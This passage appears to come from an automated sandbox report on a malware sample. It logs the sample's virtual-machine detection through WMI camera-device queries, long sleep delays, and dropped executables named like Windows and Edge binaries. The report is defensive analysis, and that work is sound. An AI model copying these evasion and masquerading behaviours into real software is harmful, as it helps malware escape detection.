                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeMemory allocated: 1A850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1B2F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1B0C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: F70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 10D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1AAE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1670000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: D60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\staticfile.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599873
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599763
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599649
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599203
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599029
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598921
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598593
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 3600000
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597609
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597390
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597060
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596947
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596716
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596586
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596472
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596234
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596124
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596015
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595906
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595797
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595687
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595578
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595468
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595359
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595250
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595140
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595031
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594921
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594811
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594703
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594593
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594375
                Source: C:\Users\user\AppData\Local\staticfile.exeWindow / User API: threadDelayed 3203
                Source: C:\Users\user\AppData\Local\staticfile.exeWindow / User API: threadDelayed 6590
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                Source: C:\Users\user\Desktop\ArELGBzuuF.exe TID: 3748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 5424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3788Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 4796Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 1564Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3116Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -31359464925306218s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599873s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599763s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599649s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599484s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599343s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599203s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -599029s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598921s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598812s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598703s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598593s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598484s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598375s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598265s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598156s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -598047s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 1520Thread sleep time: -7200000s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597937s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597828s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597718s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597609s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597500s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597390s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597281s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597172s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -597060s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596947s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596843s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596716s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596586s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596472s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596343s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596234s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596124s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -596015s >= -30000s
